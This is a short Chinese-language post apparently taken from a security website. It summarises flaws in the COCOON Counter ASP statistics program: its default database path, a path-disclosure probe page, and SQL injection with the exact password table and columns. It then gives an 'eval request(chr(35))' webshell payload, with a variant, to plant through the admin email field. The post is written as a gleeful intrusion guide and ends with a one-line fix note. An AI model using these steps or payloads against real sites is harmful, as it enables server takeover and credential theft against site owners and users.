一、默认数据库: counter/_db/db_CC_Counter6.mdb 也可直接打开:http://www.2cto.com /Counter/utilities/update.asp 查看源文件,查找<! ,就可以找到数据库的地址。程序的问题。 二、暴路径 漏洞 利用探针http://www.2cto.com /Counter/utilities/aspSysCheck.asp,查看网站路径。 三、注入 存在用户注入,猜解出用户的帐号和密码,无法拿SHELL只可社工利用。 http://www.2cto.com /xxcount/core/default.asp?id=xxcnc 流量统计用户名是xxcnc,保存密码的表名是t_Site,用户名列是UID,密码列是PWD,登录页面(http://www.2cto.com /xxcount/supervise/login.asp) 四、后台插马 需要进后台,可插一句拿SHELL。不过大多说管理员密码都为admin,管理员密码并未保存在 数据库 中,在_inc/Common. asp 中。 具体:进后台在管理信箱那把 cnhacker@263.net":eval request(chr(35))// 复制过去,,点击保存,看下_inc/common.asp的内容。 WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//" 嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将"转义成了\"所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。 另注:黑防也有人提到了类似方法,可以写成9xiao"%><%eval request(chr(35))%><%',这个方法也比较巧妙,//和'在asp都是注释语句! by 逍遥复仇 www.2cto.com提供修方案: 注意修改默认路径和默认密码。加强过滤和验证。
查看更多关于COCOON Counter统计程序漏洞总结 - 网站安全 - 自学的详细内容...